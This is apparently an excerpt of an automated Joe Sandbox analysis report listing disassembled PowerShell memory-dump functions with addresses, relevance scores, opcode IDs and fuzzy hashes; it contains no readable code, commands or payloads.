                                              • Snapshot File: hcaresult_16_2_7ffaacd80000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 82723e4f3f0133a36049534fa463361446fe4fa73a3c40e6fdeb810b13f1ff95
                                              • Instruction ID: dfe1cf81daa5d6833e27fb01a781d78cbe42c692a97833041b9745807d0bd644
                                              • Opcode Fuzzy Hash: 82723e4f3f0133a36049534fa463361446fe4fa73a3c40e6fdeb810b13f1ff95
                                              • Instruction Fuzzy Hash: 87D15962A0E7CA8FF766AB6888555B57FA0EF46320F4801FAE45DC70D3D918DD0A83D1
                                              Function 00007FFAACB9ED40 Relevance: .1, Instructions: 126COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.1729661297.00007FFAACB9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB9D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_7ffaacb9d000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aa7e4f03e3ab053a4b02a22dc0b9c2df4cdb4ae2af173ef2ca27d3fb8133db40
                                              • Instruction ID: c56f4765589ea7ee56d04758909c2694cb37858e3cc820b7fa6e08cbff24e80d
                                              • Opcode Fuzzy Hash: aa7e4f03e3ab053a4b02a22dc0b9c2df4cdb4ae2af173ef2ca27d3fb8133db40
                                              • Instruction Fuzzy Hash: 9541F63040EBC48FE7569B28D845A523FF0EF57220B1905DFD088CB1A3D62AE849C792
                                              Function 00007FFAACCB97B1 Relevance: .1, Instructions: 109COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.1730479448.00007FFAACCB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB5000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_7ffaaccb5000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 555aab06627ab5e00e060ee60fd4867a2034d72f2152070bead75df71e804799
                                              • Instruction ID: b8143f3611183fe5d1dcb5fce946f65ab99a555af82ad6fcd91fd5f63224cc4c
                                              • Opcode Fuzzy Hash: 555aab06627ab5e00e060ee60fd4867a2034d72f2152070bead75df71e804799
                                              • Instruction Fuzzy Hash: B731867091CA4C9FDB1CDB5CD84A6A977E0FB99721F00421FE449D3251DB71A855CBC2
                                              Function 00007FFAACCBB56C Relevance: .1, Instructions: 92COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.1730479448.00007FFAACCB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB5000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_7ffaaccb5000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aedf79c89050ea6a8097ed3a9b9ec285d391cc5520720e33153bc875cf7e8bfb
                                              • Instruction ID: 1a16e9e46e2a7c68b6ba7f3307256e349002baa25411c19b7c6e5fd45d8f5965
                                              • Opcode Fuzzy Hash: aedf79c89050ea6a8097ed3a9b9ec285d391cc5520720e33153bc875cf7e8bfb
                                              • Instruction Fuzzy Hash: E521B071A0CB4C8FEB58DF9C984A7E97BE0EBA6321F00816BD44DC3152D6749859CB92
                                              Function 00007FFAACCB33B5 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.1730479448.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_7ffaaccb0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                              • Instruction ID: e2b619141ef1fcec1be8a3c7fe6995b56e1b19d1a77c61dd063c573ac02f6c0a
                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                              • Instruction Fuzzy Hash: 7F01847010CB088FD744EF0CE051AA6B3E0FF89320F10052DE58AC3661DA22E882CB41
                                              Function 00007FFAACCBA0FB Relevance: .0, Instructions: 42COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.1730479448.00007FFAACCB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB5000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_7ffaaccb5000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 447d54f66ac29fb99007217499f3422efe9c8451e696c6572a63a9dd2f6d217b
                                              • Instruction ID: e082aa6950ae265c0ef3cbdd212594903328751ee7bc600a0685dae1eb1baea6
                                              • Opcode Fuzzy Hash: 447d54f66ac29fb99007217499f3422efe9c8451e696c6572a63a9dd2f6d217b
                                              • Instruction Fuzzy Hash: 31F0F676519B89CFE785DF5CA8650E57FE0EF66202B0441A7D54CC7162DA21881CC7D1
                                              Function 00007FFAACD8414D Relevance: .0, Instructions: 37COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.1731149826.00007FFAACD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_7ffaacd80000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f1df97d405e6e512d2d240501cbbb73f543480d18c40273a0086bd376b2ea1f
                                              • Instruction ID: f377187402d1aed192c482805f5e76ca3fdbd789974bedcd152afc979f489d06
                                              • Opcode Fuzzy Hash: 6f1df97d405e6e512d2d240501cbbb73f543480d18c40273a0086bd376b2ea1f
                                              • Instruction Fuzzy Hash: 7DF09A32A0D5088FE7A9EB6CE8458B877E0EF5532071100BBE06DC71A3CE25EC44C780
                                              Function 00007FFAACD84400 Relevance: .0, Instructions: 35COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.1731149826.00007FFAACD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_7ffaacd80000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0772db235b75f66db1cc40d4bb89a575eaf9a0f86cde83ebcc9c0dcc585bcc94
                                              • Instruction ID: 94c2dc2eea16cce6acfd3b15a37fc9595a90669bce3171151af2a6ca8dcfd406
                                              • Opcode Fuzzy Hash: 0772db235b75f66db1cc40d4bb89a575eaf9a0f86cde83ebcc9c0dcc585bcc94
                                              • Instruction Fuzzy Hash: F1F0BE72A0D5488FE765EB2CE4958B87BE0EF05320B0100BAE05DC7063CA25EC44C780
                                              Function 00007FFAACD841D1 Relevance: .0, Instructions: 29COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.1731149826.00007FFAACD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_7ffaacd80000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                              • Instruction ID: 296876416a085f06d4d3e74e16b8ee2bcb13bfbe78047f05c55245ac62924c45
                                              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                              • Instruction Fuzzy Hash: 66E01A31B0C808CFEAA8DB0CE0509B977E1EB9933171141B7D15EC7561CA22ED559BC0

                                              Non-executed Functions

                                              Function 00007FFAACCB896C Relevance: 6.4, Strings: 5, Instructions: 158COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.1730479448.00007FFAACCB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB5000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_7ffaaccb5000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: N_^$N_^$N_^$N_^$N_^
                                              • API String ID: 0-2528851458
                                              • Opcode ID: 89646e415b2a7603adfc46f52c4963bcb1dd2de876420af5bd294af1fd395568
                                              • Instruction ID: 0e54b0b331b92ecbbd756abb780bc25d0ed0703fa20f2b9b764ef6f4af7ecc07
                                              • Opcode Fuzzy Hash: 89646e415b2a7603adfc46f52c4963bcb1dd2de876420af5bd294af1fd395568
                                              • Instruction Fuzzy Hash: ED41A3A390F7C38FF31A479A4C7A0A16FD0EF6321570D42F6C1998B493ED196A4A43D2
                                              Function 00007FFAACCB8BFA Relevance: 6.3, Strings: 5, Instructions: 91COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.1730479448.00007FFAACCB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB5000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_7ffaaccb5000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: N_^5$N_^8$N_^F$N_^I$N_^K
                                              • API String ID: 0-759930175
                                              • Opcode ID: 61277c2efa12210fc9e80e4083bcfcb4b1a8ec1a5abbb06f509938720e162bba
                                              • Instruction ID: 3fa02eebaf7beba508b2bf9de6d9e4dc393c93b5291fdbb85a5c591e48238003
                                              • Opcode Fuzzy Hash: 61277c2efa12210fc9e80e4083bcfcb4b1a8ec1a5abbb06f509938720e162bba
                                              • Instruction Fuzzy Hash: 2121F2F7B141264E93017BBDAC659E87B84DF9427534942F2D29CCF603DE14608A8AC6
                                              Function 00007FFAACCB83D3 Relevance: 5.3, Strings: 4, Instructions: 276COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.1730479448.00007FFAACCB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB5000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_7ffaaccb5000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: N_^$N_^$N_^$N_^
                                              • API String ID: 0-3900292545
                                              • Opcode ID: c176709df62a10a0df3dd89b9becb35d91c6f9c87b5fa216bba05fdfec5b5123
                                              • Instruction ID: 281b9c000dc656dd01ecd514132401b9214c240f2922a628c62cddca12c7caa4
                                              • Opcode Fuzzy Hash: c176709df62a10a0df3dd89b9becb35d91c6f9c87b5fa216bba05fdfec5b5123
                                              • Instruction Fuzzy Hash: 0581A39390EBC38BF35647B9AC760E16FD0EF5316A70941F7C1888B493EE04A91E8391
                                              Function 00007FFAACCB89D3 Relevance: 5.1, Strings: 4, Instructions: 130COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.1730479448.00007FFAACCB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB5000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_7ffaaccb5000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: N_^$N_^$N_^$N_^
                                              • API String ID: 0-3900292545
                                              • Opcode ID: 6599be43579c555d27dae5bcbf7fc23cde906eaa8fc792447ae6305c839166d2
                                              • Instruction ID: b22c6b934ea9363ce48f554ee95eab47ed73043060088af68eb8d36cd67d5d0e
                                              • Opcode Fuzzy Hash: 6599be43579c555d27dae5bcbf7fc23cde906eaa8fc792447ae6305c839166d2
                                              • Instruction Fuzzy Hash: 6641CFE390EBC38BF35A479A5C760A16FD0EF6221970D42F6C1998B583ED146A4A43C2
                                              Function 00007FFAACCB0590 Relevance: 5.1, Strings: 4, Instructions: 78COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.1730479448.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_7ffaaccb0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: H18$P/8$p08$/8
                                              • API String ID: 0-641494954
                                              • Opcode ID: 0d84abe3f1c340664d8323f15714483d5153c69640013a40ead289e6a3a301b6
                                              • Instruction ID: 35a5b6863babb13628cf1091ffef4beb2a5ae7590e06b40f6e6274dd12603ffb
                                              • Opcode Fuzzy Hash: 0d84abe3f1c340664d8323f15714483d5153c69640013a40ead289e6a3a301b6
                                              • Instruction Fuzzy Hash: C6218BC790FAC25FF2554BE919151AA6E91EF97A00718C0FBE08C4B69B9C08DD0DC7CA

                                              Executed Functions

                                              Function 00007FFAACDA6605 Relevance: .4, Instructions: 445COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1934802802.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ffaacda0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c8230563c416c13550e9acb1657e7c41e6be3daaa2960fc5eae6408a4c5545c0
                                              • Instruction ID: 8d804158fb77ab46565d34e7897b5ef419aa09df3a141ec3d39a10f936e2a821
                                              • Opcode Fuzzy Hash: c8230563c416c13550e9acb1657e7c41e6be3daaa2960fc5eae6408a4c5545c0
                                              • Instruction Fuzzy Hash: CAD16866A0EB8ACFF766AB7848155B5BFA0EF56710B0801FED05DC70D3DA18D80A83D1
                                              Function 00007FFAACCD9D48 Relevance: .2, Instructions: 220COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1933824261.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ffaaccd0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4cf34d06fdf461dc9ac65a095e8934ed5c7d8f49fd4a1cc5e52ea7da78305785
                                              • Instruction ID: 683b8cc548a40b832e33467d39e7c6813561b4163bb8295de4834a8dc8ce9902
                                              • Opcode Fuzzy Hash: 4cf34d06fdf461dc9ac65a095e8934ed5c7d8f49fd4a1cc5e52ea7da78305785
                                              • Instruction Fuzzy Hash: EEF0E235809A8CCFDB46DF2888596E57FF0FF26200B0402EBE44DD7061EA25D928C7C2
                                              Function 00007FFAACDA4073 Relevance: .2, Instructions: 185COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1934802802.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ffaacda0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 419de86daf1694221c4659346b9060b4e27a3223a03d25a88310f4876fb49d23
                                              • Instruction ID: b57874374ff893bdccc6506d4ba4dd235ba607f51f5d871799ea62fc46550fed
                                              • Opcode Fuzzy Hash: 419de86daf1694221c4659346b9060b4e27a3223a03d25a88310f4876fb49d23
                                              • Instruction Fuzzy Hash: FD512572B0EA468FF799DB2C88516747BD2EF96620B5850BBC16DC7193DE24EC0983C1
                                              Function 00007FFAACDA4370 Relevance: .1, Instructions: 147COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1934802802.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ffaacda0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b7167e2c5c2eb171b4b28847b1adab358680345bf59c54d05a376140a3a475c5
                                              • Instruction ID: f656e1c74f1bed850a402aab0ddfd3a9d4a658e578b494a4fded88884cc0406e
                                              • Opcode Fuzzy Hash: b7167e2c5c2eb171b4b28847b1adab358680345bf59c54d05a376140a3a475c5
                                              • Instruction Fuzzy Hash: 92412572B0EA498FF7A5D72894556B87BD1EF85620B4814BED06DC7183EE18EC1883C1
                                              Function 00007FFAACCD9748 Relevance: .1, Instructions: 134COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1933824261.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ffaaccd0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f528e4de368abd5e4cc6410ada81196eafb1ec3208a04f0cbb7c39bdb721bc02
                                              • Instruction ID: b8efe45213e99979a329c116d0e609b112a221e287502c0fd35e15d0a9494373
                                              • Opcode Fuzzy Hash: f528e4de368abd5e4cc6410ada81196eafb1ec3208a04f0cbb7c39bdb721bc02
                                              • Instruction Fuzzy Hash: 84412A7190CB488FEB589F5CA84A7A97BE0FB95311F04816FE04D93292DA34E855CBC2
                                              Function 00007FFAACBBED40 Relevance: .1, Instructions: 124COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1932717540.00007FFAACBBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBBD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ffaacbbd000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6a8a158063dc2a1937106d471e40b309a8b9adbd5c84c4b3a94d59169080d237
                                              • Instruction ID: 2af1300b4224573323083fcba993ab61bdb21fbdce56683ed2f730cf7a846c4d
                                              • Opcode Fuzzy Hash: 6a8a158063dc2a1937106d471e40b309a8b9adbd5c84c4b3a94d59169080d237
                                              • Instruction Fuzzy Hash: 6441087140EBC49FE7569B28D8459523FF0EF57320B1906DFE098CB1A3D629E849C7A2
                                              Function 00007FFAACCDA62C Relevance: .1, Instructions: 99COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1933824261.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ffaaccd0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2494e5c960d45cbd28662fa8e9bf3475da199b7c95c4e3b24f61ac3ac79658f2
                                              • Instruction ID: e985a1ba2f49d85b2ce879ecd48485f7e0b6f05f8719752d64d665f4c7cb2fe3
                                              • Opcode Fuzzy Hash: 2494e5c960d45cbd28662fa8e9bf3475da199b7c95c4e3b24f61ac3ac79658f2
                                              • Instruction Fuzzy Hash: 7221E93190CB4C8FEB59DF6C984A7E97FE0EB96321F04416BD04DD3152DA74941ACB91
                                              Function 00007FFAACDA40BF Relevance: .1, Instructions: 98COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1934802802.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ffaacda0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f0c8e7e03d0c5adad734635bde2e332fa01d32747e6b83b70845aefa21d0894e
                                              • Instruction ID: f188a99c1de436102f2d325a2969486f19ec3628ce9ac3eab88518c74dd7a17c
                                              • Opcode Fuzzy Hash: f0c8e7e03d0c5adad734635bde2e332fa01d32747e6b83b70845aefa21d0894e
                                              • Instruction Fuzzy Hash: 93210673B0FA878FF3A5DB1C88511746AD1EF52610B9990BAD16DC71D2DE28DC089381
                                              Function 00007FFAACDA43BC Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1934802802.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ffaacda0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c0e788ff20d38f851090e78d7483e0a1c8801291951b7a88662220e58397e1d0
                                              • Instruction ID: 854fab353d618705819fea8087bcc737f814dda04bd6354abd81ca32f03abe30
                                              • Opcode Fuzzy Hash: c0e788ff20d38f851090e78d7483e0a1c8801291951b7a88662220e58397e1d0
                                              • Instruction Fuzzy Hash: 92112572A0FA498FF7A5E72894945B87FD0EF4262074950FAD06DC7093DE58EC088381
                                              Function 00007FFAACCD33B5 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1933824261.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ffaaccd0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                              • Instruction ID: c5fe5ef16c9603e2c38b2b8f18b6b479cf07841371c6c5dc00f7d796ae02029c
                                              • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                              • Instruction Fuzzy Hash: BB01847010CB088FD744EF0CE051AA5B3E0FB89320F10052EE58AC3661DA22E882CB41
                                              Function 00007FFAACCDA2A9 Relevance: .0, Instructions: 26COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1933824261.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ffaaccd0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1ef38a26dfdd5792f792603ad3455ca228cb17e2e8102a74b067b3fb7c51c5be
                                              • Instruction ID: d41df39a798b3437ba79390cd3b444d48bae656da50148c75c9b055815b2e40a
                                              • Opcode Fuzzy Hash: 1ef38a26dfdd5792f792603ad3455ca228cb17e2e8102a74b067b3fb7c51c5be
                                              • Instruction Fuzzy Hash: 9DE01275504A4C8F9B49DF18D4555E97FE0FB65201B01425BE41EC7160DB719958CBC1

                                              Non-executed Functions

                                              Function 00007FFAACCD06B0 Relevance: 10.1, Strings: 8, Instructions: 100COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1933824261.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ffaaccd0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (08$8,8$H18$P/8$]$p08$-8$/8
                                              • API String ID: 0-2918203648
                                              • Opcode ID: 58e0da83ab523231f197645f31bd62ee6a5081dc8faf8faea9b809af61ad7653
                                              • Instruction ID: a0f173741c8c332a49fd24beb2b3e67d9316f74f7a55c8d63b4b24644a80d040
                                              • Opcode Fuzzy Hash: 58e0da83ab523231f197645f31bd62ee6a5081dc8faf8faea9b809af61ad7653
                                              • Instruction Fuzzy Hash: 0031858380FBC15FF36646AC5C1A2666E91EB5364071880FFF0CC4B5DB8449994DC7CA
                                              Function 00007FFAACCD8B69 Relevance: 6.4, Strings: 5, Instructions: 156COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1933824261.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ffaaccd0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: L_^7$L_^8$L_^?$L_^@$L_^F
                                              • API String ID: 0-3711972127
                                              • Opcode ID: bf76e125d16ff9d24a8199eee5d34aad6103ce9738fad9af1909415e48979cf6
                                              • Instruction ID: fcf63cc871f73b9ac530c265c75d17237a1364065ddb55483caca3f6cad8f254
                                              • Opcode Fuzzy Hash: bf76e125d16ff9d24a8199eee5d34aad6103ce9738fad9af1909415e48979cf6
                                              • Instruction Fuzzy Hash: 544127E3B084264DD2027BBDF8059FD3B90DF9527974561F6E28C8E043AF25708B86D8
                                              Function 00007FFAACCD02AD Relevance: 5.2, Strings: 4, Instructions: 233COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1933824261.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ffaaccd0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @J8$]$p@L$x.8
                                              • API String ID: 0-2266453637
                                              • Opcode ID: a0855b29400bebec87a5de86c65d681bf76b76e664f0ea4807c6229826c6ea29
                                              • Instruction ID: b89002b7ca86b269d3d01b93e7f757dd168ece14a2a5c843399ca6da184058ae
                                              • Opcode Fuzzy Hash: a0855b29400bebec87a5de86c65d681bf76b76e664f0ea4807c6229826c6ea29
                                              • Instruction Fuzzy Hash: 7B71838380FBC16FF3564BAC28552796E91EB53640B5880FBE0CC4B59BA858DE5D83C6

                                              Executed Functions

                                              Function 00007FFAACD839D1 Relevance: 2.8, Strings: 1, Instructions: 1577COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000017.00000002.2177075241.00007FFAACD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_23_2_7ffaacd80000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: L_H
                                              • API String ID: 0-402390507
                                              • Opcode ID: 3117ab141f122124a1fdd2f80752483b5df80cde5bf161e65f1a366a2c175e27
                                              • Instruction ID: e1ebab7f1265a5cb1bac687e8337c16f57b1ba30b7633cf7ae95fd02e7603c43
                                              • Opcode Fuzzy Hash: 3117ab141f122124a1fdd2f80752483b5df80cde5bf161e65f1a366a2c175e27
                                              • Instruction Fuzzy Hash: 2EA20562A0EB868FF356972C88655B47FE1EF57220B0941FBD09DC7193DE18ED0A8391
                                              Function 00007FFAACD86605 Relevance: .5, Instructions: 452COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000017.00000002.2177075241.00007FFAACD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_23_2_7ffaacd80000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 09d0f8eb734b9f9ae9f3aa1ba3a1a9dcc1bb94a7231917a4d027be76ed9aa656
                                              • Instruction ID: 00b230243a0541b678781560b6a418fa36ef31608ad28b1a9e6fb6c651302bae
                                              • Opcode Fuzzy Hash: 09d0f8eb734b9f9ae9f3aa1ba3a1a9dcc1bb94a7231917a4d027be76ed9aa656
                                              • Instruction Fuzzy Hash: 00D16BA2A0E7CA8FF766AB6888555B57BA0EF46320F0841FED05DC70C3D918DD0A83D1
                                              Function 00007FFAACB9ED40 Relevance: .1, Instructions: 123COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000017.00000002.2174534401.00007FFAACB9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB9D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_23_2_7ffaacb9d000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 253df906adcf6a7b8bde9a05263175359ee67af3292d6be99d729d99f456b288
                                              • Instruction ID: 6772b51d2999381896e3b7938d87401c1f7550a6e5ca587e9a0a851c89cca4e1
                                              • Opcode Fuzzy Hash: 253df906adcf6a7b8bde9a05263175359ee67af3292d6be99d729d99f456b288
                                              • Instruction Fuzzy Hash: 0E41D53140EBD48FE7569B29D841A523FF0EF57320B1905DFD088CB1A3D62AE84AC792
                                              Function 00007FFAACCB97B1 Relevance: .1, Instructions: 109COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000017.00000002.2175764894.00007FFAACCB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB5000, based on PE: false
                                              Joe Sandbox IDA Plugin
